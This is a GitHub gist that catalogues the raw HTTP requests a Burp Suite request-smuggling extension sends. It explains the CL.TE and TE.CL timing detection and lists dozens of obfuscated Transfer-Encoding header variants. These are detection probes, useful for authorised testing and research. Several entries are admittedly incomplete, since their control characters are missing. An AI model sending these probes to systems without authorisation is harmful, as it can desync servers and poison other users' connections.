Skip to content

Instantly share code, notes, and snippets.

@sttuartt

sttuartt/http_request_smuggler_attacks.md

Last active May 9, 2024 08:58
Show Gist options
  • Save sttuartt/d3e080dfc1c65082176c5e018ba5e7c0 to your computer and use it in GitHub Desktop.
Save sttuartt/d3e080dfc1c65082176c5e018ba5e7c0 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
http_request_smuggler_attacks.md

http request smuggler extension

description

This file captures the relevant parts of the requests generated by the http request smuggler burp suite extension.

The extension's dialog box has a large number of checkboxes, but it is not clear by looking at it, what some/most of these do.

Hopefully this will provide some insight as to what requests are actually being sent as a result of the selected tests.

Obviously you can simply leave them all checked, but running them all takes some time to complete, and repeating this for every endpoint could be quite time-consuming.

detection methodology

First run CL.TE, then run TE.CL only if CL.TE does not timeout.

...

The following request can be used for CL.TE.

This functions on the premise that the front end server uses CL, whilst the back end server uses TE.

Due to the short Content-Length, the front end will not send the 'Q', and the back end will time out while waiting for the next chunk size.

This will cause an observable time delay. If this happens there is a desync.

If both servers are in sync (TE.TE or CL.CL), the request will either be rejected by the front-end or harmlessly processed by both systems.

But if the desync occurs via TE.CL, the front-end will reject the message without ever forwarding it to the back-end.

This is thanks to the invalid chunk size 'Q'.

This prevents the back-end socket from being poisoned.

POST /about HTTP/1.1
Host: example.com
Transfer-Encoding: chunked
Content-Length: 4

1
Z
Q

The following request can be used for TE.CL:

If the front-end uses TE, then the terminating '0' chunk in the body will mean that only up to and including the '0' will be sent to the back-end - the back-end will time out waiting for the X to arrive.

If the front-end uses CL then this approach will poison the back-end socket with an X - this will harm legitimate users

Always run the CL.TE above first to rule out this possibility.

POST /about HTTP/1.1
Host: example.com
Transfer-Encoding: chunked
Content-Length: 6

0

X

These requests can be adapted to target arbitrary discrepancies in header parsing - this is basically what the http request smuggler burp suite extension does.

attacks

0dsuffix

synced

Content-Length: 13
Transfer-Encoding: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: chunked

3
x=y
1
Z
Q

encode

synced

Content-Length: 13
Transfer-%45ncoding: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-%45ncoding: chunked

3
x=y
1
Z
Q

nested

synced

Content-Length: 13
Transfer-Encoding: identity, chunked, identity

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: identity, chunked, identity

3
x=y
1
Z
Q

lazygrep

synced

Content-Length: 13
Transfer-Encoding: chunk

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: chunk

3
x=y
1
Z
Q

gareth1

synced

Content-Length: 13
Transfer-Encoding
 : chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding
 : chunked

3
x=y
1
Z
Q

multicase

synced

Content-Length: 13
tRANSFER-ENCODING: chunked

3
x=y
0

syncedBreak

Content-Length: 19
tRANSFER-ENCODING: chunked

3
x=y
1
Z
Q

quoted

synced

Content-Length: 13
Transfer-Encoding: "chunked"

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: "chunked"

3
x=y
1
Z
Q

prefix1:12

synced

Content-Length: 13
Transfer-Encoding: ^Lchunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: ^Lchunked

3
x=y
1
Z
Q

prefix1:13

synced

Content-Length: 13
Transfer-Encoding: ^Mchunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: ^Mchunked

3
x=y
1
Z
Q

prefix1:11

synced

Content-Length: 13
Transfer-Encoding: ^Kchunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: ^Kchunked

3
x=y
1
Z
Q

options

synced

OPTIONS / HTTP/1.1
...
Content-Length: 13
Transfer-Encoding: chunked

3
x=y
0

syncedBreak

OPTIONS / HTTP/1.1
...
Content-Length: 19
Transfer-Encoding: chunked

3
x=y
1
Z
Q

connection

synced

Content-Length: 13
Connection: Transfer-Encoding
Transfer-Encoding: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Connection: Transfer-Encoding
Transfer-Encoding: chunked

3
x=y
1
Z
Q

unispace

note: '**' before 'chunked' - this is the 'unispace'

0001160    g   t   h   :       1   3  \n   T   r   a   n   s   f   e   r
0001200    -   E   n   c   o   d   i   n   g   :      **   c   h   u   n
0001220    k   e   d  \n

synced

Content-Length: 13
Transfer-Encoding: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: chunked

3
x=y
1
Z
Q

dualchunk

synced

Content-Length: 13
Transfer-Encoding: chunked
Transfer-encoding: identity

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: chunked
Transfer-encoding: identity

3
x=y
1
Z
Q

h1case

synced

Content-Length: 13
TRANSFER-ENCODING: chunked

3
x=y
0

syncedBreak

Content-Length: 19
TRANSFER-ENCODING: chunked

3
x=y
1
Z
Q

accentCH

synced

Content-Length: 13
Transfer-Encoding: ch<U+0096>nked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: ch<U+0096>nked

3
x=y
1
Z
Q

linewrapped1

synced

Content-Length: 13
Transfer-Encoding:
 chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding:
 chunked

3
x=y
1
Z
Q

spacefix1:127

synced

Content-Length: 13
Transfer-Encoding:^?chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding:^?chunked

3
x=y
1
Z
Q

namesuffix1:127

synced

Content-Length: 13
Transfer-Encoding^?: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding^?: chunked

3
x=y
1
Z
Q

tabwrap

synced

Content-Length: 13
Transfer-Encoding:
        chunked     (note: this is a leading tab \t)

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding:
        chunked     (note: this is a leading tab \t)

3
x=y
1
Z
Q

spacejoin1

i.e. "Transfer Encoding" instead of "Transfer-Encoding"

synced

Content-Length: 13
Transfer Encoding: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer Encoding: chunked

3
x=y
1
Z
Q

badwrap

synced

POST / HTTP/1.1
 Transfer-Encoding: chunked
Host: ...
...
Content-Length: 13
X-Blah-Ignore: chunked

3
x=y
0

syncedBreak

POST / HTTP/1.1
 Transfer-Encoding: chunked
Host: ...
...
Content-Length: 19
X-Blah-Ignore: chunked

3
x=y
1
Z
Q

revdualchunk

synced

Content-Length: 13
Transfer-Encoding: identity
Transfer-Encoding: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: identity
Transfer-Encoding: chunked

3
x=y
1
Z
Q

accentTE

synced

Content-Length: 13
Transf<U+0082>r-Encoding: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transf<U+0082>r-Encoding: chunked

3
x=y
1
Z
Q

vertwrap

synced

Content-Length: 13
Transfer-Encoding:
^Kchunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding:
^Kchunked

3
x=y
1
Z
Q

spacefix1:0

synced

Content-Length: 13
Transfer-Encoding:^@chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding:^@chunked

3
x=y
1
Z
Q

http1.0

synced

POST / HTTP/1.0
...
Content-Length: 13
Transfer-Encoding: chunked

3
x=y
0

syncedBreak

POST / HTTP/1.0
...
Content-Length: 19
Transfer-Encoding: chunked

3
x=y
1
Z
Q

spjunk

synced

Content-Length: 13
Transfer-Encoding x: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding x: chunked

3
x=y
1
Z
Q

namesuffix1:13

synced

Content-Length: 13
Transfer-Encoding^M: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding^M: chunked

3
x=y
1
Z
Q

namesuffix1:12

synced

Content-Length: 13
Transfer-Encoding^L: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding^L: chunked

3
x=y
1
Z
Q

namesuffix1:11

synced

Content-Length: 13
Transfer-Encoding^K: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding^K: chunked

3
x=y
1
Z
Q

spacefix1:9

synced

Content-Length: 13
Transfer-Encoding:      chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding:      chunked

3
x=y
1
Z
Q

suffix1:0

synced

Content-Length: 13
Transfer-Encoding: chunked^@

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: chunked^@

3
x=y
1
Z
Q

nospace1

synced

Content-Length: 13
Transfer-Encoding:chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding:chunked

3
x=y
1
Z
Q

prefix1:9

synced

Content-Length: 13
Transfer-Encoding:      chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding:      chunked

3
x=y
1
Z
Q

range

synced

Content-Length: 13
Transfer-Encoding: chunked
Range: bytes=0-0

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: chunked
Range: bytes=0-0

3
x=y
1
Z
Q

suffix1:13

note: can't actually see what this is supposed to be...previous :13 examples have been ^M, but that is not present here..

synced

Content-Length: 13
Transfer-Encoding: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: chunked

3
x=y
1
Z
Q

prefix1:0

synced

Content-Length: 13
Transfer-Encoding: ^@chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: ^@chunked

3
x=y
1
Z
Q

suffix1:12

synced

Content-Length: 13
Transfer-Encoding: chunked^L

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: chunked^L

3
x=y
1
Z
Q

spacefix1:13

synced

Content-Length: 13
Transfer-Encoding:^Mchunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding:^Mchunked

3
x=y
1
Z
Q

suffix1:11

synced

Content-Length: 13
Transfer-Encoding: chunked^K

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: chunked^K

3
x=y
1
Z
Q

spacefix1:12

synced

Content-Length: 13
Transfer-Encoding:^Lchunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding:^Lchunked

3
x=y
1
Z
Q

spacefix1:11

synced

Content-Length: 13
Transfer-Encoding:^Kchunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding:^Kchunked

3
x=y
1
Z
Q

suffix1:9

note: can't actually see what this is supposed to be...previous :9 examples have been 6xspaces, but that is not present here..

synced

Content-Length: 13
Transfer-Encoding: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: chunked

3
x=y
1
Z
Q

head

synced

HEAD / HTTP/1.1
...
Content-Length: 13
Transfer-Encoding: chunked

3
x=y
0

syncedBreak

HEAD / HTTP/1.1
...
Content-Length: 19
Transfer-Encoding: chunked

3
x=y
1
Z
Q

spaceFF

0000000    T   r   a   n   s   f   e   r   -   E   n   c   o   d   i   n
0000020    g   :   ÿ  **   c   h   u   n   k   e   d  \n
0000034

synced

Content-Length: 13
Transfer-Encoding:ÿchunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding:ÿchunked

3
x=y
1
Z
Q

aposed

synced

Content-Length: 13
Transfer-Encoding: 'chunked'

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: 'chunked'

3
x=y
1
Z
Q

cowComma

synced

Content-Length: 13
Transfer-Encoding: identity, chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: identity, chunked

3
x=y
1
Z
Q

get

synced

GET / HTTP/1.1
...
Content-Length: 13
Transfer-Encoding: chunked

3
x=y
0

syncedBreak

GET / HTTP/1.1
...
Content-Length: 19
Transfer-Encoding: chunked

3
x=y
1
Z
Q

UPPERCASE

synced

Content-Length: 13
TRANSFER-ENCODING: chunked

3
x=y
0

syncedBreak

Content-Length: 19
TRANSFER-ENCODING: chunked

3
x=y
1
Z
Q

backslash

synced

Content-Length: 13
Transfer\Encoding: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer\Encoding: chunked

3
x=y
1
Z
Q

0dwrap

synced

Content-Length: 13
Foo: bar
^MTransfer-Encoding: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Foo: bar
^MTransfer-Encoding: chunked

3
x=y
1
Z
Q

nameprefix1

synced

Content-Length: 13
Foo: bar
 Transfer-Encoding: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Foo: bar
 Transfer-Encoding: chunked

3
x=y
1
Z
Q

prefix1:127

synced

Content-Length: 13
Transfer-Encoding: ^?chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: ^?chunked

3
x=y
1
Z
Q

nameprefix2

synced

Content-Length: 13
Foo: bar
        Transfer-Encoding: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Foo: bar
        Transfer-Encoding: chunked

3
x=y
1
Z
Q

0dspam

synced

Content-Length: 13
Tra^Mnsfer-Encoding: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Tra^Mnsfer-Encoding: chunked

3
x=y
1
Z
Q

commaCow

synced

Content-Length: 13
Transfer-Encoding: chunked, identity

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: chunked, identity

3
x=y
1
Z
Q

contentEnc

synced

Content-Length: 13
Content-Encoding: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Content-Encoding: chunked

3
x=y
1
Z
Q

badsetupCR

synced

Content-Length: 13
Foo: bar^MTransfer-Encoding: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Foo: bar^MTransfer-Encoding: chunked

3
x=y
1
Z
Q

valueprefix1

Don't know what this is supposed to be..

synced

Content-Length: 13
Transfer-Encoding:  chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding:  chunked

3
x=y
1
Z
Q

namesuffix1:0

synced

Content-Length: 13
Transfer-Encoding^@: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding^@: chunked

3
x=y
1
Z
Q

tabsuffix

Don't know what this is supposed to be..

synced

Content-Length: 13
Transfer-Encoding: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: chunked

3
x=y
1
Z
Q

namesuffix1:9

synced

Content-Length: 13
Transfer-Encoding       : chunked

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding       : chunked

3
x=y
1
Z
Q

badsetupLF

Don't know what this is supposed to be..

synced

Content-Length: 13
Foo: bar
Transfer-Encoding: chunked

3
x=y
0

syncedBreak

Content-Length: 19
Foo: bar
Transfer-Encoding: chunked

3
x=y
1
Z
Q

removed

synced

Content-Length: 13
Nothing-interesting: 1

3
x=y
0

syncedBreak

Content-Length: 19
Nothing-interesting: 1

3
x=y
1
Z
Q

suffix1:127

synced

Content-Length: 13
Transfer-Encoding: chunked^?

3
x=y
0

syncedBreak

Content-Length: 19
Transfer-Encoding: chunked^?

3
x=y
1
Z
Q

bodysplit

synced

Content-Length: 13
X: y
Foo: barn

3
x=y
0

syncedBreak

Content-Length: 19
X: y
Foo: barn

3
x=y
1
Z
Q
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment